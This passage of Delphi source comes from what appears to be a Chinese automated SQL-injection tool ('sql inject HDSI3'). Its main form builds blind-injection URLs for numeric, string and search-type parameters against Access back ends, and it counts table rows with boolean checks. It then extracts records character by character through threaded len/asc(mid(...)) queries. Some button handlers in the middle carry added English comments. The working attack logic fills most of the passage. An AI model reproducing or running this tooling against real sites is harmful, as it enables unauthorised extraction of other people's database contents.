📄 main_unit.pas

📁 sql inject HDSI3--delphi.rar
         begin
              application.ProcessMessages;
              sleep(100);
         end;

          application.MessageBox(pchar('猜解结束'),pchar('提示'),mb_ok);
          exit;

    end;  //猜解access结束

    if (cjdatabase_unit.Inject_methord=0) or (define_unit.FDbName='') then
    begin
       Application.MessageBox(pchar('未进行数据库检测,不能进行!'),pchar('警告'),mb_ok);
       exit;
    end;
    
    //如果没有报错信息,进行暴力猜解表
    if cjdatabase_unit.IferrReport=false then
    begin
          begin
            Form_main.executeDBtable(main_unit.g_sContent);
            Application.MessageBox(pchar('猜解完毕'),pchar('提示'),mb_ok);
            //暴力破解完就退出
            exit;
          end;

    end;
    try
      ListView_table.Clear;
      TableCount:=GetUserTableCount(str_url);

      for i:=1 to TableCount do
      begin
          if not assigned(ThdErrorTableObj[i-1]) then
            ThdErrorTableObj[i-1]:=TThreadErrorTable.Create(true);
          ThdErrorTableObj[i-1].FURL:=str_url;
          ThdErrorTableObj[i-1].iRow:=i;
          ThdErrorTableObj[i-1].Resume;
      end;


      for i:=1 to TableCount  do
      begin
        if Form_main.stop_table= true then
        begin
          terminatethread(ThdErrorTableObj[i-1].handle,0);
          ThdErrorTableObj[i-1].Free;
          ThdErrorTableObj[i-1]:=nil;
        end;
        if assigned(ThdErrorTableObj[i-1]) then
        begin
            
            while (ThdErrorTableObj[i-1].complete=false) do
            begin
               application.ProcessMessages;
               sleep(100);
            end;
              //item:=ListView_table.Items.Add;
              //item.Caption:=(inttostr(I));
              //tableName:= ThdErrorTableObj[i-1].TableName;
              //RecordCount:=ThdErrorTableObj[i-1].RowCount;
              //ThdErrorTableObj[i-1].Free;
              //ThdErrorTableObj[i-1]:=nil;
              //item.SubItems.Add(tableName);
              //item.SubItems.Add(RecordCount);
              ThdErrorTableObj[i-1].Free;
              ThdErrorTableObj[i-1]:=nil;
              ThdObjCompleteCount:=ThdObjCompleteCount+1;


        end;

      end;


    finally
        Application.MessageBox(pchar('猜解完毕'),pchar('提示'),mb_ok);
    end;
    except
    end;
end;

// Click handler for Button1. Toggles the visibility of four controls on the
// main form (GroupBox5, Label2 and suiComboBox2_url become visible,
// ComboBox_URL is hidden) and then shows t1 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.Button1Click(Sender: TObject);
begin
  // Reveal the alternate URL entry controls ...
  GroupBox5.Visible := True;
  Label2.Visible := True;
  suiComboBox2_url.Visible := True;
  // ... and hide the original URL combo box.
  ComboBox_URL.Visible := False;
  t1.Show();
end;

// Click handler for RzBitBtn1: brings up t2 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// NOTE(review): RzBitBtn2Click also shows t2, while the remaining
// RzBitBtnNClick handlers map button N to tN — confirm whether t1 was
// intended here. Sender is not used.
procedure TForm_main.RzBitBtn1Click(Sender: TObject);
begin
  t2.Show();
end;

// Click handler for RzBitBtn2: brings up t2 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn2Click(Sender: TObject);
begin
  t2.Show();
end;

// Click handler for RzBitBtn3: brings up t3 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn3Click(Sender: TObject);
begin
  t3.Show();
end;

// Click handler for RzBitBtn4: brings up t4 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn4Click(Sender: TObject);
begin
  t4.Show();
end;

// Click handler for RzBitBtn5: brings up t5 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn5Click(Sender: TObject);
begin
  t5.Show();
end;

// Click handler for RzBitBtn6: brings up t6 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn6Click(Sender: TObject);
begin
  t6.Show();
end;

// Click handler for RzBitBtn7: brings up t7 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn7Click(Sender: TObject);
begin
  t7.Show();
end;

// Click handler for RzBitBtn8: brings up t8 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn8Click(Sender: TObject);
begin
  t8.Show();
end;

// Click handler for RzBitBtn9: brings up t9 (presumably a secondary form
// declared in another unit — verify against the unit's declarations).
// Sender is not used.
procedure TForm_main.RzBitBtn9Click(Sender: TObject);
begin
  t9.Show();
end;
//****************************************************************
procedure TForm_main.suiButton_recordClick(Sender: TObject);
var
    j:integer;
    i:integer;
    item:TListItem;
    column:TListColumn;
    str_url:string;
    TableName:string;
    ColumnNames:TStringList;
    str_msg:string;
    Count_FieldsSelected:integer;
    FieldListSub,FieldListMain:string;
    DescStr,AscStr:string;
    condition:string;
    URL_CheckCount:string;
    Record_Count:string;//记录数
    i_Record_Count:integer;//记录数
    aresult:string;//记录内容
    URL_CheckLen,URL_CheckAsc:string;
    RecordNO:integer;
    RecordValue_Len:string;//记录的字符长度
    len:integer;// 记录的字符长度
    ii:integer;
    URL_Replaced:string;
    ipos:integer;
    recordcount:integer;
begin
try
  //初始化

    Form_main.stop_table:=true;
    Form_main.stop_column:=true;
    Form_main.stop_record:=false;
    Form_main.stop_check:=true;
    Count_FieldsSelected:=0;
    ipos:=0;
    ii:=0;
    len:=0;
    RecordNO:=0;
    i_Record_Count:=0;
  //如果没有注入地址,退出
  if suiComboBox2_url.Text='' then
    begin
      Application.MessageBox(pchar('注入地址不能为空,请添入注入地址'),pchar('警告'),mb_ok);
      exit;
    end;
  str_url:=TRIM(suiComboBox2_url.Text);
  TableName:=ListView_table.Selected.SubItems[0];
  //未猜解到表的列名,退出
  if ListView_column.Items.Count=0 then
  begin
      Application.MessageBox(pchar('未猜解表的列名,不能进行'),pchar('警告'),mb_ok);
      exit;
  end;
  //未选定表,退出
  if ListView_table.SelCount<>1 then
    begin
      Application.MessageBox(pchar('未选择需要导出表的表名,请选择'),pchar('警告'),mb_ok);
      exit;
    end;
   //access
   if cjdatabase_unit.Database_methord=3 then
   begin
        try
        //先清空记录和列名
        form_main.ListView_record.Clear;
        form_main.ListView_record.Columns.Clear;
        //构造一些sql需要的子语句
        for i:=1 to ListView_column.Items.Count do
        begin
            if ListView_column.Items[i-1].Checked then
            begin
                  Count_FieldsSelected:=Count_FieldsSelected+1;
                  FieldListSub := FieldListSub+ ListView_column.Items[i-1].SubItems[0] + ',';
                  FieldListMain := FieldListMain +'cstr([' + ListView_column.Items[i-1].SubItems[0] + '])%2Bchr(124)%2B';
            end;
        end;
        //对sql子语句进行预先处理
        If Rightstr(FieldListMain, 3)='%2B' Then FieldListMain:= Leftstr(FieldListMain, Length(FieldListMain) - 3);
        If (Count_FieldsSelected > 1) And (Rightstr(FieldListMain,11)='%2Bchr(124)') Then FieldListMain:=Leftstr(FieldListMain, Length(FieldListMain) - 11);
        If Rightstr(FieldListSub, 1)= ','  Then AscStr:= Leftstr(FieldListSub, Length(FieldListSub) - 1);
        DescStr:= stringReplace(FieldListSub, ',' , '%20desc,',[rfReplaceAll]);
        If Rightstr(DescStr, 1) = ',' Then DescStr:= Leftstr(DescStr, Length(DescStr) - 1);
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access1'+E.Message);
        end;

        try
        //创建列名
        //ColumnNames:=TStringList.Create;
        for i:=1 to ListView_column.Items.Count do
        begin
            if ListView_column.Items[i-1].Checked then
            begin
              item:=ListView_column.Items[i-1];
              //ColumnNames.Add(item.SubItems[0]);
              column:=ListView_record.Columns.Add;
              column.Caption:=item.SubItems[0];
            end;
        end;
        condition:='1=1';
        if TableName='' then
          exit;
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access2'+E.Message);
        end;
        try
        //构造一个sql语句
        case CJdatabase_unit.Inject_methord of
        0:  exit;
        1:  //数字型
          begin
            URL_CheckCount:=str_url+'%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:= '';
          end;
        2: //字符型
          begin
            URL_CheckCount:= str_url+'''%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:='%20And%20''''=''';
          end;
        3: //搜索型
           begin
            URL_CheckCount:=str_url+'%25''%20and%20(select%20count(1)%20from%20['+TableName+']';
            URL_Check_End:='%20And%20''%25''=''';
           end;
        end; //end of case
        //猜解表的记录数
        if condition>'' then  URL_CheckCount:=URL_CheckCount+ '%20Where%20' + Condition + ')';
        If  CommonCheckStr(URL_CheckCount+'<10'+ URL_Check_End)  Then
          Record_Count:= CommonGetChar(URL_CheckCount, 0, 9)
            Else If CommonCheckStr(URL_CheckCount + '<32' + URL_Check_End) Then
                      Record_Count:= CommonGetChar(URL_CheckCount, 0, 31)
                        else if CommonCheckStr(URL_CheckCount + '<52' + URL_Check_End) Then
                          Record_Count:= CommonGetChar(URL_CheckCount, 0,51)
                            Else If CommonCheckStr(URL_CheckCount+ '<100' + URL_Check_End) Then
                              Record_Count:= CommonGetChar(URL_CheckCount, 0, 99)
                                else   Record_Count:='99';

        i_Record_Count:=strtoint(Record_Count);
        except on E:exception do
            define_unit.SaveToLogFile('c:\','access3'+E.Message);
        end;


        //循环猜解记录
        for RecordNO:=1 to i_Record_Count do
        begin
              try
              item:=ListView_record.Items.Add;
              aresult:='';
              //停止退出
              if  Form_main.stop_record=true then
              begin
                  break;
              end;
              //猜解整条记录长度的sql
              case  CJdatabase_unit.Inject_methord of
               1:
                 begin
                 URL_CheckLen:=str_url+'%20and%20(select%20top%201%20len('+FieldListMain+')%20from%20(select%20top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20from%20['+tablename+']%20[CONDITION]%20order%20by%20'+AscStr+')%20T%20order%20by%20'+DescStr+')';
                 URL_CheckAsc:=str_url+'%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                 end;
                2:
                  begin
                   URL_CheckLen:=str_url+ '''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                   URL_CheckAsc:= str_url+'''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                  end;
                3:
                  begin
                   URL_CheckLen:=str_url+ '%25''%20And%20(Select%20Top%201%20len(' + FieldListMain + ')%20From%20(Select%20Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20T%20Order%20by%20'+DescStr+')';
                   URL_CheckAsc:=str_url+ '%25''%20And%20(Select%20Top%201%20abs(asc(mid('+FieldListMain+',[NUM],1)))%20From%20(Select Top%20'+inttostr(RecordNO)+'%20'+AscStr+'%20From%20['+tablename+']%20[CONDITION]%20Order%20by%20'+AscStr+')%20TOrder%20by%20'+DescStr+')';
                  end;
              end;//end of case

              If Condition <>'' Then
              begin
                   URL_CheckLen:=StringReplace(URL_CheckLen, '[CONDITION]', Trim('%20Where%20' + Condition), [rfIgnoreCase]);
                   URL_CheckAsc:= StringReplace(URL_CheckAsc, '[CONDITION]', Trim('%20Where%20'+ Condition),[rfReplaceAll]);
              end
              else
                  begin
                   URL_CheckLen:= StringReplace(URL_CheckLen, '[CONDITION]','', [rfReplaceAll]);
                   URL_CheckAsc:= StringReplace(URL_CheckAsc, '[CONDITION]', '',[rfReplaceAll]);
                   end;
                   
              If CommonCheckStr(URL_CheckLen + '<=12' + URL_Check_End) Then
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 12)
                 else If CommonCheckStr(URL_CheckLen + '<=32' + URL_Check_End) Then
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 32)
                    else
                   RecordValue_Len:= CommonGetChar(URL_CheckLen, 1, 256);

              except on E:Exception do
                define_unit.SaveToLogFile('c:\','access4'+E.Message);
              end;

              try
              If strtoint(RecordValue_Len) > 0 Then
              begin
                 len:=strtoint(RecordValue_Len);
                 if len >=128 then  len:=128;
              end;
              //循环字符数,猜解每个字符
              For ii:= 1 To len do  //猜字符
              begin
                   if  Form_main.stop_record=true then
                     begin
                       break;
                     end;
                     URL_Replaced:= StringReplace(URL_CheckAsc, '[NUM]', inttostr(ii),[rfReplaceAll]);

                   If CommonCheckStr(URL_Replaced + '%20BETWEEN%201%20And%20256' + URL_Check_End) Then
                   begin
                        if not assigned(recordCharObj[ii]) then
                        begin
                          recordCharObj[ii-1]:=TThreadRecDataACC.Create(true);
                        end;
                        recordCharObj[ii-1].FURL:=URL_Replaced; //+ '%20BETWEEN%201%20And%20256' + URL_Check_End;
                        recordCharObj[ii-1].min_num:=1;
                        recordCharObj[ii-1].max_num:=256;
                        recordCharObj[ii-1].Resume;
                   end
                   Else If CommonCheckStr(URL_Replaced + '%20BETWEEN%201%20And%2065536' + URL_Check_End) Then
                         begin
                            if not assigned(recordCharObj[ii]) then
                            begin
                                recordCharObj[ii-1]:=TThreadRecDataACC.Create(true);
                            end;
                            recordCharObj[ii-1].FURL:=URL_Replaced;
                            recordCharObj[ii-1].min_num:=1;
                            recordCharObj[ii-1].max_num:=65536;
                            recordCharObj[ii-1].Resume;

                         end;
               end;// end of for猜解字符的循环

                except on E:exception do
                  define_unit.SaveToLogFile('c:\','access5'+E.Me
